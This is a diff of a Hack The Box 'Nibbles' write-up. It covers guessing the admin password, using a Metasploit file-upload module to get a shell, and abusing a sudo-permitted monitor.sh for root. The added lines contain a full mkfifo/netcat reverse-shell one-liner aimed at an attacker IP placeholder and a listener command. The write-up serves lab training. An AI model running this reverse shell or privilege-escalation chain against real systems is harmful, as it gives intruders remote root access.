amcclead7336/BoxReports/Hack The Box/nibbles/readme.md

 I did some targeted guessing and after about 5 minutes, I guessed admin:nibbles

 #### msfconsole
 Now that I have all the information I needed I was able to use the handy metasploit module exploit/multi/http/nibbleblog_file_upload.

-After running the command, I could access the target machine as nibble.
-Looking at the /home/nibble directory, I found user flag file.
+After running the command, I could access the target machine as nibbler.
+Looking at the /home/nibbler directory, I found user flag file.

 ***

 ### Escalating Privileges
 #### sudo
+As a matter of course, I always run sudo -l when I need to escalate my privileges.
+It's an easy check and can be a quick KO.
+Sure enough, there was a allowed command:
+`sudo /home/nibbler/personal/stuff/monitor.sh`

+If you look at the /home/nibbles directory, you'll notice a tar file named personal.tar.
+You can expand this file with:
+`tar -xvf pernsonal.tar`

+#### Reverse Shell
+Once expanded, you can navigate to /home/nibble/personal/stuff and modify monitor.sh.

+I wiped the file with:
+`echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <att IP> <att port> >/tmp/f" > monitor.sh`

+I could have just appended the line however I was returning errors when I tried running it normally.
+Instead of trying to debug I just over wrote it.
+In a real scenario I would have made a copy of the file before messing with it.

+Finally I set up a listener on my machine with:
+`nc -lvnp 4443`
+`sudo /home/nibbler/personal/stuff/monitor.sh`